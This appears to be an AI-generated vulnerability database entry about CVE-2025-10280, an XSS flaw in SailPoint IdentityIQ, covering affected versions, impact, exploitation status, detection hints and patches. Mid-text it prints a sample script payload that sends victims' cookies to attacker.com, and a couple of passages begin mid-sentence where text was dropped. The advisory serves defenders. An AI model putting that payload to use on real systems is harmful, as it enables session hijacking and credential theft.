
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-10280 is a Cross-Site Scripting (XSS) vulnerability in SailPoint IdentityIQ caused by incorrect Content-Type handling in certain web service endpoints. Affected versions include IdentityIQ 8.5, IdentityIQ 8.4 and all 8.4 patch levels prior to 8.4p4, IdentityIQ 8.3 and all 8.3 patch levels prior to 8.3p6, and all prior versions. The vulnerability was published on November 3, 2025, with a patch advisory released by SailPoint on November 12, 2025. It carries a CVSS v3.1 base score of 6.1 (Medium) (SailPoint Advisory, ENISA EUVD).
The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting). Certain IdentityIQ web services that are designed to serve non-HTML content can be accessed via URL paths that force the server to set the Content-Type response header to text/html. Because the content returned by these endpoints is not properly HTML-escaped, a browser interpreting the response as HTML will execute any embedded scripts. This attack pattern aligns with CAPEC-209 (XSS Using MIME Type Mismatch) and requires no authentication (privileges required: none) but does require user interaction, such as a victim clicking a crafted link (SailPoint Advisory, ENISA EUVD).
Successful exploitation allows an attacker to execute malicious scripts in the context of a victim's browser session within the IdentityIQ application. This can lead to session hijacking, theft of sensitive authentication tokens or credentials, and unauthorized actions performed on behalf of the victim user — including access to identity governance data managed by IdentityIQ. The scope is changed (S:C), meaning the impact extends beyond the vulnerable component to the user's browser environment, with low confidentiality and low integrity impact per the CVSS scoring (SailPoint Advisory).
As of the time of reporting, there is no public proof-of-concept exploit code and no evidence of in-the-wild exploitation (ENISA EUVD). No threat actor attribution has been reported. The EPSS score is approximately 0.041%, indicating a low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires user interaction (e.g., a victim clicking a crafted URL), which reduces the likelihood of mass exploitation.
Content-Type: text/html, embedding an unescaped script payload in a parameter or path segment (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>).<, >, script, %3C, %3E) in URL paths or query parameters; repeated access to the same unusual endpoint from different user accounts.SailPoint has released patches addressing this vulnerability. Organizations should upgrade to IdentityIQ 8.4p4 or later (for the 8.4 branch), IdentityIQ 8.3p6 or later (for the 8.3 branch), or the latest available release for version 8.5. As interim measures, administrators should implement strict Web Application Firewall (WAF) rules to block requests containing XSS payloads targeting IdentityIQ endpoints, restrict web service access to authorized users only, and monitor access logs for suspicious activity. Implementing proper output encoding and input validation at the application layer is also recommended as a defense-in-depth measure (SailPoint Advisory).
The vulnerability received standard coverage from vulnerability tracking platforms including Vulners, VulDB, CVEFeed, and CIRCL's vulnerability lookup service shortly after publication. CYFIRMA included it in their weekly intelligence report for November 7, 2025. No notable independent researcher commentary or significant social media discussion has been identified beyond routine aggregation and tracking (CYFIRMA Report).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."